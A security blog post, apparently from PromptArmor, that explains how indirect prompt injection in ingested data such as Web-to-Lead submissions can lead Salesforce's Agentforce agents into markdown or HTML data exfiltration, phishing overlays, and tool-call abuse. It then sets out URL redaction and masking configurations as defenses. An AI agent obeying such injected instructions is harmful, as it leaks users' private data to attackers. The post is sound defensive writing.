Blog
Table of Content
One key way Salesforce mitigates AI risk
Agentforce, Salesforce's agentic AI, faces data exfiltration and phishing threats stemming from indirect prompt injection; we detail how it mitigates this risk.
What is Agentforce, and what risks does it face?
Agentforce is Salesforce's agentic AI layer. Its agents read CRM records, draft communications, and take actions, returning generated output to users inside the Salesforce web app.
Because those agents act on data they ingest (for example, Web-to-Lead submissions), an attacker who places an indirect prompt injection in that data can manipulate the agent's output to attempt several well-known attacks:
Markdown image-based data exfiltration. If the model is manipulated to output an externally sourced markdown image with user data appended to the URL, data can be exfiltrated as soon as the image renders in chat with no click required. PromptArmor's Threat Intelligence Team disclosed this vulnerability across several apps, including exfiltration of connected data sources from OpenAI's Codex and sensitive emails from Superhuman AI.
Markdown link-based data exfiltration and phishing. A generated link can carry data in its URL or send the user to a credential-harvesting page dressed up as a routine action. PromptArmor demonstrated how Slack AI could be manipulated to present a malicious hyperlink that exfiltrated API keys from private Slack channels when clicked.
HTML overlay phishing. If HTML is not sanitized from agent output, manipulated output can overwrite the user's interface by rendering iFrames of attacker sites. PromptArmor published on this vulnerability, showing how vLex (now Clio) rendered fake login pop-ups. This technique was also used to overwrite the entire user interface in Ollama.
HTML-based data exfiltration. If externally sourced HTML (or CSS) is generated and rendered, with sensitive data appended to the element's source URL, that data can be exfiltrated. This vulnerability was disclosed to and remediated by vLex (now Clio) alongside the HTML overlay exploit, and Ollama also exhibited this risk.
Tool-call manipulation. Any agent that can call tools and interact with data can be manipulated to take actions under the directive of a prompt injection. PromptArmor demonstrated this risk, showing that Copilot Cowork can exfiltrate files from Drive and SharePoint due to a missing human-in-the-loop step, and that ChatGPT for Google Sheets could exfiltrate user workbooks via tool call manipulation.
The first three attacks described above share a key characteristic: an attacker-controlled URL surviving into the agent's rendered output.
The defense: URL redaction
When an agent's response is rendered inside the Salesforce web app, any URL not demarcated as a trusted URL is stripped from the output and replaced with the literal string [URL_REDACTED]. Because Markdown and HTML-based data exfiltration attacks rely on untrusted URLs reaching rendered output, redacting untrusted URLs serves as a powerful defense to reduce the attack surface.
How redaction addresses risks
This analysis describes Agentforce Chat inside the Salesforce web app. Salesforce ships many more AI features, exposes MCP servers, and presents a large attack surface overall, so URL redaction addresses only a subset of the risk. For example, the agent's ability to call tools in Agentforce requires other defenses, such as human-in-the-loop approval, to prevent attacks like the exploit against Microsoft Copilot Cowork.
Configurations for Salesforce AI output processing
First, we wanted to note that for some use cases, it is necessary to allow certain URLs in model output. To allow specific URLs, configure the following:
Restrict and allowlist output URLs. To allow agents to output external URLs, add each one explicitly:
Setup → Quick Find → "Trusted URLs" → Trusted URLs → New Trusted URL
Avoid wildcard patterns that allow any site hosting user-generated or otherwise untrusted content.
Set CSP directives in the same settings page to disallow
img-srcunless images are meant to render from the target domain. This reduces the risk of Markdown image-based data exfiltration.
Next, we note several Salesforce settings that reduce the risk surface for indirect prompt injection:
Mask sensitive data in the Einstein Trust Layer.
Masking data works by substituting sensitive data with a placeholder before a prompt is sent to the LLM. This prevents the agent, under the influence of a prompt injection, from taking actions such as encoding sensitive data and appending the encoded result to a malicious URL.
Configure data masking here:
Setup → Einstein → Einstein Generative AI → Einstein Trust Layer → Data Masking → Large Language Model Data Masking
Turn on Large Language Model Data Masking first; it is the parent category, and the options below are only applicable once it is on.
Pattern-based masking is available and can be enabled for the following data types: Name, Email Address, Phone Number, Credit Card, US SSN, US ITIN, US Drivers License, Passport, IBAN Code, and Company Name.
Data Masking → Pattern-based → Sensitive Data
Field-based masking covers fields by compliance category (PII, HIPAA, GDPR, PCI, COPPA, and CCPA) and by data sensitivity level (Public, Internal, Confidential, Restricted, and Mission Critical).
Data Masking → Field-based → Compliance Categories / Data Sensitivity Levels
Prompt injection detection (beta)
Salesforce additionally offers a prompt injection detection setting:
Setup → Einstein → Einstein Generative AI → Einstein Trust Layer → Safety & Security → Prompt Injection Detection
However, this setting is currently in beta and subject to beta terms; as such Salesforce appears to train AI on customer data when prompt injection detection is enabled.